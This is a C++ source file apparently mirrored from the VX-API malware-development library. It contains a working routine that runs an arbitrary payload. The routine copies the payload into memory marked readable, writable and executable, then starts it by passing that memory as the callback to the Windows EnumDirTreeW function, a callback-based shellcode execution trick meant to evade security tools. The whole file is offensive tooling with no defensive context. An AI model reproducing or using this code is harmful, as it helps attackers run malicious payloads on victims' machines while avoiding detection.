mirror of https://github.com/vxunderground/VX-API
28 lines
822 B
C++
28 lines
822 B
C++
#include "Win32Helper.h"
|
|
|
|
VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
|
|
{
|
|
WCHAR DisposeableBuffer[512] = { 0 };
|
|
|
|
if (!SymInitialize(GetCurrentProcessNoForward(), NULL, TRUE))
|
|
return;
|
|
|
|
EnumDirTreeW(GetCurrentProcessNoForward(), L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
|
|
|
SymCleanup(GetCurrentProcessNoForward());
|
|
}
|
|
|
|
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
|
{
|
|
LPVOID BinAddress = NULL;
|
|
|
|
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
|
if (BinAddress == NULL)
|
|
return FALSE;
|
|
|
|
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
|
|
|
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDirTreeWThreadCallbackRoutine, BinAddress, INFINITE);
|
|
|
|
return TRUE;
|
|
} |